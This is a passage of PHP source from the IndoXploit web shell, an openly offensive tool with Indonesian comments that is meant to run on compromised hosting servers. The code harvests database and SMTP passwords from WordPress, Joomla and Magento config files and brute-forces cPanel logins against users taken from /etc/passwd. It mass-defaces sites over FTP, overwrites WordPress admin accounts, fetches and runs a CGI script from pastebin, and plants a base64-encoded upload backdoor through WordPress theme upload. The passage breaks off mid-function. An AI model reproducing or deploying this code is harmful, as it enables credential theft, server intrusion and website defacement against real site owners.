  706. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  707. }
  708. mysql_close($conn);
  709. }
  710. }
  711. }
  712. } else {
  713. echo "<center>
  714. <h1>Auto Edit User Config</h1>
  715. <form method='post'>
  716. DIR Config: <br>
  717. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  718. Set User & Pass: <br>
  719. <input type='text' name='user_baru' value='indoxploit' placeholder='user_baru'><br>
  720. <input type='text' name='pass_baru' value='indoxploit' placeholder='pass_baru'><br>
  721. <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  722. </form>
  723. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  724. ";
  725. }
  726. } elseif($_GET['do'] == 'cpanel') {
  727. if($_POST['crack']) {
  728. $usercp = explode("\r\n", $_POST['user_cp']);
  729. $passcp = explode("\r\n", $_POST['pass_cp']);
  730. $i = 0;
  731. foreach($usercp as $ucp) {
  732. foreach($passcp as $pcp) {
  733. if(@mysql_connect('localhost', $ucp, $pcp)) {
  734. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  735. } else {
  736. $_SESSION[$ucp] = "1";
  737. $_SESSION[$pcp] = "1";
  738. if($ucp == '' || $pcp == '') {
  739.  
  740. } else {
  741. $i++;
  742. if(function_exists('posix_getpwuid')) {
  743. $domain_cp = file_get_contents("/etc/named.conf");
  744. if($domain_cp == '') {
  745. $dom = "<font color=red>gabisa ambil nama domain nya</font>";
  746. } else {
  747. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  748. foreach($domains_cp[1] as $dj) {
  749. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  750. $user_cp_url = $user_cp_url['name'];
  751. if($user_cp_url == $ucp) {
  752. $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
  753. break;
  754. }
  755. }
  756. }
  757. } else {
  758. $dom = "<font color=red>function is Disable by system</font>";
  759. }
  760. echo "domain |<font color=lime>$dom</font>|<font color=lime>$ucp</font>|$pcp<br>";
  761. }
  762. }
  763. }
  764. }
  765. }
  766. if($i == 0) {
  767. } else {
  768. echo "<br>sukses nyolong ".$i." Cpanel by <font color=lime>IndoXploit.</font>";
  769. }
  770. } else {
  771. echo "<center>
  772. <form method='post'>
  773. USER: <br>
  774. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  775. $_usercp = fopen("/etc/passwd","r");
  776. while($getu = fgets($_usercp)) {
  777. if($getu == '' || !$_usercp) {
  778. echo "<font color=red>Can't read /etc/passwd</font>";
  779. } else {
  780. preg_match_all("/(.*?):x:/", $getu, $u);
  781. foreach($u[1] as $user_cp) {
  782. if(is_dir("/home/$user_cp/public_html")) {
  783. echo "$user_cp\n";
  784. }
  785. }
  786. }
  787. }
  788. echo "</textarea><br>
  789. PASS: <br>
  790. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  791. function cp_pass($dir) {
  792. $pass = "";
  793. $dira = scandir($dir);
  794. foreach($dira as $dirb) {
  795. if(!is_file("$dir/$dirb")) continue;
  796. $ambil = file_get_contents("$dir/$dirb");
  797. if(preg_match("/WordPress/", $ambil)) {
  798. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  799. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  800. $pass .= ambilkata($ambil,"password = '","'")."\n";
  801. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  802. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  803. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  804. $pass .= ambilkata($ambil,'password = "','"')."\n";
  805. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  806. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  807. } elseif(preg_match("/^[client]$/", $ambil)) {
  808. preg_match("/password=(.*?)/", $ambil, $pass1);
  809. if(preg_match('/"/', $pass1[1])) {
  810. $pass1[1] = str_replace('"', "", $pass1[1]);
  811. $pass .= $pass1[1]."\n";
  812. } else {
  813. $pass .= $pass1[1]."\n";
  814. }
  815. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  816. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  817. }
  818. }
  819. echo $pass;
  820. }
  821. $cp_pass = cp_pass($dir);
  822. echo $cp_pass;
  823. echo "</textarea><br>
  824. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  825. </form>
  826. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  827. }
  828. } elseif($_GET['do'] == 'cpftp_auto') {
  829. if($_POST['crack']) {
  830. $usercp = explode("\r\n", $_POST['user_cp']);
  831. $passcp = explode("\r\n", $_POST['pass_cp']);
  832. $i = 0;
  833. foreach($usercp as $ucp) {
  834. foreach($passcp as $pcp) {
  835. if(@mysql_connect('localhost', $ucp, $pcp)) {
  836. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  837. } else {
  838. $_SESSION[$ucp] = "1";
  839. $_SESSION[$pcp] = "1";
  840. if($ucp == '' || $pcp == '') {
  841. //
  842. } else {
  843. echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  844. $ftp_conn = ftp_connect(gethostbyname($_SERVER['HTTP_HOST']));
  845. $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
  846. if((!$ftp_login) || (!$ftp_conn)) {
  847. echo "[+] <font color=red>Login Gagal</font><br><br>";
  848. } else {
  849. echo "[+] <font color=lime>Login Sukses</font><br>";
  850. $fi = htmlspecialchars($_POST['file_deface']);
  851. $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
  852. if($deface) {
  853. $i++;
  854. echo "[+] <font color=lime>Deface Sukses</font><br>";
  855. if(function_exists('posix_getpwuid')) {
  856. $domain_cp = file_get_contents("/etc/named.conf");
  857. if($domain_cp == '') {
  858. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  859. } else {
  860. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  861. foreach($domains_cp[1] as $dj) {
  862. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  863. $user_cp_url = $user_cp_url['name'];
  864. if($user_cp_url == $ucp) {
  865. echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
  866. break;
  867. }
  868. }
  869. }
  870. } else {
  871. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  872. }
  873. } else {
  874. echo "[-] <font color=red>Deface Gagal</font><br><br>";
  875. }
  876. }
  877. //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  878. }
  879. }
  880. }
  881. }
  882. }
  883. if($i == 0) {
  884. } else {
  885. echo "<br>sukses deface ".$i." Cpanel by <font color=lime>IndoXploit.</font>";
  886. }
  887. } else {
  888. echo "<center>
  889. <form method='post'>
  890. Filename: <br>
  891. <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
  892. Deface Page: <br>
  893. <input type='text' name='deface' placeholder='http://www.web-yang-udah-di-deface.com/filemu.php' style='width: 450px;'><br>
  894. USER: <br>
  895. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  896. $_usercp = fopen("/etc/passwd","r");
  897. while($getu = fgets($_usercp)) {
  898. if($getu == '' || !$_usercp) {
  899. echo "<font color=red>Can't read /etc/passwd</font>";
  900. } else {
  901. preg_match_all("/(.*?):x:/", $getu, $u);
  902. foreach($u[1] as $user_cp) {
  903. if(is_dir("/home/$user_cp/public_html")) {
  904. echo "$user_cp\n";
  905. }
  906. }
  907. }
  908. }
  909. echo "</textarea><br>
  910. PASS: <br>
  911. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  912. function cp_pass($dir) {
  913. $pass = "";
  914. $dira = scandir($dir);
  915. foreach($dira as $dirb) {
  916. if(!is_file("$dir/$dirb")) continue;
  917. $ambil = file_get_contents("$dir/$dirb");
  918. if(preg_match("/WordPress/", $ambil)) {
  919. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  920. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  921. $pass .= ambilkata($ambil,"password = '","'")."\n";
  922. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  923. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  924. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  925. $pass .= ambilkata($ambil,'password = "','"')."\n";
  926. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  927. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  928. } elseif(preg_match("/client/", $ambil)) {
  929. preg_match("/password=(.*)/", $ambil, $pass1);
  930. if(preg_match('/"/', $pass1[1])) {
  931. $pass1[1] = str_replace('"', "", $pass1[1]);
  932. $pass .= $pass1[1]."\n";
  933. }
  934. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  935. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  936. }
  937. }
  938. echo $pass;
  939. }
  940. $cp_pass = cp_pass($dir);
  941. echo $cp_pass;
  942. echo "</textarea><br>
  943. <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
  944. </form>
  945. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  946. }
  947. } elseif($_GET['do'] == 'smtp') {
  948. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  949. function scj($dir) {
  950. $dira = scandir($dir);
  951. foreach($dira as $dirb) {
  952. if(!is_file("$dir/$dirb")) continue;
  953. $ambil = file_get_contents("$dir/$dirb");
  954. $ambil = str_replace("$", "", $ambil);
  955. if(preg_match("/JConfig|joomla/", $ambil)) {
  956. $smtp_host = ambilkata($ambil,"smtphost = '","'");
  957. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  958. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  959. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  960. $smtp_port = ambilkata($ambil,"smtpport = '","'");
  961. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  962. echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
  963. echo "SMTP port: <font color=lime>$smtp_port</font><br>";
  964. echo "SMTP user: <font color=lime>$smtp_user</font><br>";
  965. echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
  966. echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
  967. echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
  968. }
  969. }
  970. }
  971. $smpt_hunter = scj($dir);
  972. echo $smpt_hunter;
  973. } elseif($_GET['do'] == 'auto_wp') {
  974. if($_POST['hajar']) {
  975. $title = htmlspecialchars($_POST['new_title']);
  976. $pn_title = str_replace(" ", "-", $title);
  977. if($_POST['cek_edit'] == "Y") {
  978. $script = $_POST['edit_content'];
  979. } else {
  980. $script = $title;
  981. }
  982. $conf = $_POST['config_dir'];
  983. $scan_conf = scandir($conf);
  984. foreach($scan_conf as $file_conf) {
  985. if(!is_file("$conf/$file_conf")) continue;
  986. $config = file_get_contents("$conf/$file_conf");
  987. if(preg_match("/WordPress/", $config)) {
  988. $dbhost = ambilkata($config,"DB_HOST', '","'");
  989. $dbuser = ambilkata($config,"DB_USER', '","'");
  990. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  991. $dbname = ambilkata($config,"DB_NAME', '","'");
  992. $dbprefix = ambilkata($config,"table_prefix = '","'");
  993. $prefix = $dbprefix."posts";
  994. $option = $dbprefix."options";
  995. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  996. $db = mysql_select_db($dbname);
  997. $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  998. $result = mysql_fetch_array($q);
  999. $id = $result[ID];
  1000. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1001. $result2 = mysql_fetch_array($q2);
  1002. $target = $result2[option_value];
  1003. $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  1004. $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  1005. echo "<div style='margin: 5px auto;'>";
  1006. if($target == '') {
  1007. echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
  1008. } else {
  1009. echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  1010. }
  1011. if(!$update OR !$conn OR !$db) {
  1012. echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  1013. } else {
  1014. echo "<font color=lime>sukses di ganti.</font><br>";
  1015. }
  1016. echo "</div>";
  1017. mysql_close($conn);
  1018. }
  1019. }
  1020. } else {
  1021. echo "<center>
  1022. <h1>Auto Edit Title+Content WordPress</h1>
  1023. <form method='post'>
  1024. DIR Config: <br>
  1025. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  1026. Set Title: <br>
  1027. <input type='text' name='new_title' value='Hacked by IndoXploit' placeholder='New Title'><br><br>
  1028. Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  1029. <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
  1030. <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
  1031. <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
  1032. </form>
  1033. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  1034. ";
  1035. }
  1036. } elseif($_GET['do'] == 'zoneh') {
  1037. if($_POST['submit']) {
  1038. $domain = explode("\r\n", $_POST['url']);
  1039. $nick = $_POST['nick'];
  1040. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  1041. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  1042. function zoneh($url,$nick) {
  1043. $ch = curl_init("http://www.zone-h.com/notify/single");
  1044. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1045. curl_setopt($ch, CURLOPT_POST, true);
  1046. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  1047. return curl_exec($ch);
  1048. curl_close($ch);
  1049. }
  1050. foreach($domain as $url) {
  1051. $zoneh = zoneh($url,$nick);
  1052. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  1053. echo "$url -> <font color=lime>OK</font><br>";
  1054. } else {
  1055. echo "$url -> <font color=red>ERROR</font><br>";
  1056. }
  1057. }
  1058. } else {
  1059. echo "<center><form method='post'>
  1060. <u>Defacer</u>: <br>
  1061. <input type='text' name='nick' size='50' value='IndoXploit'><br>
  1062. <u>Domains</u>: <br>
  1063. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  1064. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  1065. </form>";
  1066. }
  1067. echo "</center>";
  1068. } elseif($_GET['do'] == 'cgi') {
  1069. $cgi_dir = mkdir('idx_cgi', 0755);
  1070. $file_cgi = "idx_cgi/cgi.izo";
  1071. $isi_htcgi = "AddHandler cgi-script .izo";
  1072. $htcgi = fopen(".htaccess", "w");
  1073. $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
  1074. $cgi = fopen($file_cgi, "w");
  1075. fwrite($cgi, $cgi_script);
  1076. fwrite($htcgi, $isi_htcgi);
  1077. chmod($file_cgi, 0755);
  1078. echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  1079. } elseif($_GET['do'] == 'fake_root') {
  1080. ob_start();
  1081. function reverse($url) {
  1082. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  1083. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  1084. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
  1085. curl_setopt($ch, CURLOPT_HEADER, 0);
  1086. curl_setopt($ch, CURLOPT_POST, 1);
  1087. $resp = curl_exec($ch);
  1088. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  1089. $array = explode(",,", $resp);
  1090. unset($array[0]);
  1091. foreach($array as $lnk) {
  1092. $lnk = "http://$lnk";
  1093. $lnk = str_replace(",", "", $lnk);
  1094. echo $lnk."\n";
  1095. ob_flush();
  1096. flush();
  1097. }
  1098. curl_close($ch);
  1099. }
  1100. function cek($url) {
  1101. $ch = curl_init($url);
  1102. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  1103. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  1104. $resp = curl_exec($ch);
  1105. return $resp;
  1106. }
  1107. $cwd = getcwd();
  1108. $ambil_user = explode("/", $cwd);
  1109. $user = $ambil_user[2];
  1110. if($_POST['reverse']) {
  1111. $site = explode("\r\n", $_POST['url']);
  1112. $file = $_POST['file'];
  1113. foreach($site as $url) {
  1114. $cek = cek("$url/~$user/$file");
  1115. if(preg_match("/hacked/i", $cek)) {
  1116. echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
  1117. }
  1118. }
  1119. } else {
  1120. echo "<center><form method='post'>
  1121. Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
  1122. User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
  1123. Domain: <br>
  1124. <textarea style='width: 450px; height: 250px;' name='url'>";
  1125. reverse($_SERVER['HTTP_HOST']);
  1126. echo "</textarea><br>
  1127. <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
  1128. </form><br>
  1129. NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
  1130. }
  1131. } elseif($_GET['do'] == 'adminer') {
  1132. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1133. function adminer($url, $isi) {
  1134. $fp = fopen($isi, "w");
  1135. $ch = curl_init();
  1136. curl_setopt($ch, CURLOPT_URL, $url);
  1137. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  1138. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1139. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  1140. curl_setopt($ch, CURLOPT_FILE, $fp);
  1141. return curl_exec($ch);
  1142. curl_close($ch);
  1143. fclose($fp);
  1144. ob_flush();
  1145. flush();
  1146. }
  1147. if(file_exists('adminer.php')) {
  1148. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1149. } else {
  1150. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  1151. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1152. } else {
  1153. echo "<center><font color=red>gagal buat file adminer</font></center>";
  1154. }
  1155. }
  1156. } elseif($_GET['do'] == 'auto_dwp') {
  1157. if($_POST['auto_deface_wp']) {
  1158. function anucurl($sites) {
  1159. $ch = curl_init($sites);
  1160. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1161. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1162. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1163. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1164. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1165. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1166. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1167. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1168. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1169. $data = curl_exec($ch);
  1170. curl_close($ch);
  1171. return $data;
  1172. }
  1173. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  1174. $post = array(
  1175. "log" => "$userr",
  1176. "pwd" => "$pass",
  1177. "rememberme" => "forever",
  1178. "wp-submit" => "$wp_submit",
  1179. "redirect_to" => "$web",
  1180. "testcookie" => "1",
  1181. );
  1182. $ch = curl_init($cek);
  1183. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1184. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1185. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1186. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1187. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1188. curl_setopt($ch, CURLOPT_POST, 1);
  1189. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  1190. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1191. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1192. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1193. $data = curl_exec($ch);
  1194. curl_close($ch);
  1195. return $data;
  1196. }
  1197. $scan = $_POST['link_config'];
  1198. $link_config = scandir($scan);
  1199. $script = htmlspecialchars($_POST['script']);
  1200. $user = "indoxploit";
  1201. $pass = "indoxploit";
  1202. $passx = md5($pass);
  1203. foreach($link_config as $dir_config) {
  1204. if(!is_file("$scan/$dir_config")) continue;
  1205. $config = file_get_contents("$scan/$dir_config");
  1206. if(preg_match("/WordPress/", $config)) {
  1207. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1208. $dbuser = ambilkata($config,"DB_USER', '","'");
  1209. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1210. $dbname = ambilkata($config,"DB_NAME', '","'");
  1211. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1212. $prefix = $dbprefix."users";
  1213. $option = $dbprefix."options";
  1214. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1215. $db = mysql_select_db($dbname);
  1216. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1217. $result = mysql_fetch_array($q);
  1218. $id = $result[ID];
  1219. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1220. $result2 = mysql_fetch_array($q2);
  1221. $target = $result2[option_value];
  1222. if($target == '') {
  1223. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1224. } else {
  1225. echo "[+] $target <br>";
  1226. }
  1227. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1228. if(!$conn OR !$db OR !$update) {
  1229. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1230. mysql_close($conn);
  1231. } else {
  1232. $site = "$target/wp-login.php";
  1233. $site2 = "$target/wp-admin/theme-install.php?upload";
  1234. $b1 = anucurl($site2);
  1235. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  1236. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  1237. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  1238. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  1239. $www = "m.php";
  1240. $fp5 = fopen($www,"w");
  1241. fputs($fp5,$upload3);
  1242. $post2 = array(
  1243. "_wpnonce" => "$anu2",
  1244. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  1245. "themezip" => "@$www",
  1246. "install-theme-submit" => "Install Now",
  1247. );
  1248. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  1249. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1250. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1251. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1252. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1253. curl_setopt($ch, CURLOPT_POST, 1);
  1254. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  1255. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1256. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1257. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1258. $data3 = curl_exec($ch);
  1259. curl_close($ch);
  1260. $y = date("Y");
  1261. $m = date("m");
  1262. $namafile = "id.php";
  1263. $fpi = fopen($namafile,"w");
  1264. fputs($fpi,$script);
  1265. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  1266. curl_setopt($ch6, CURLOPT_POST, true);
  1267. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  1268. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  1269. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  1270. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  1271. curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  1272. $postResult = curl_exec($ch6);
  1273. curl_close($ch6);
  1274. $as = "$target/k.php";
  1275. $bs = anucurl($as);
  1276. if(preg_match("#$script#is", $bs)) {
  1277. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  1278. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  1279. } else {
  1280. echo "[-] <font color='red'>gagal mepes...</font><br>";
  1281. echo "[!!] coba aja manual: <br>";
  1282. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1283. echo "[+] username: <font color=lime>$user</font><br>";
  1284. echo "[+] password: <font color=lime>$pass</font><br><br>";
  1285. }
  1286. mysql_close($conn);
  1287. }
  1288. }
  1289. }
  1290. } else {
  1291. echo "<center><h1>WordPress Auto Deface</h1>
  1292. <form method='post'>
  1293. <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
  1294. <input type='text' name='script' height='10' size='50' placeholder='Hacked by IndoXploit' required><br>
  1295. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  1296. </form>
  1297. <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
  1298. </center>";
  1299. }
  1300. } elseif($_GET['do'] == 'auto_dwp2') {
  1301. if($_POST['auto_deface_wp']) {
  1302. function anucurl($sites) {
  1303. $ch = curl_init($sites);
  1304. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1305. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1306. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1307. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1308. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1309. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1310. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1311. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1312. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  1313. $data = curl_exec($ch);
  1314. curl_close($ch);
  1315. return $data;
  1316. }
  1317. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  1318. $post = array(
  1319. "log" => "$userr",
  1320. "pwd" => "$pass",
  1321. "rememberme" => "forever",
  1322. "wp-submit" => "$wp_submit",
  1323. "redirect_to" => "$web",
  1324. "testcookie" => "1",
  1325. );
  1326. $ch = curl_init($cek);
  1327. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1328. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1329. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1330. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1331. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1332. curl_setopt($ch, CURLOPT_POST, 1);
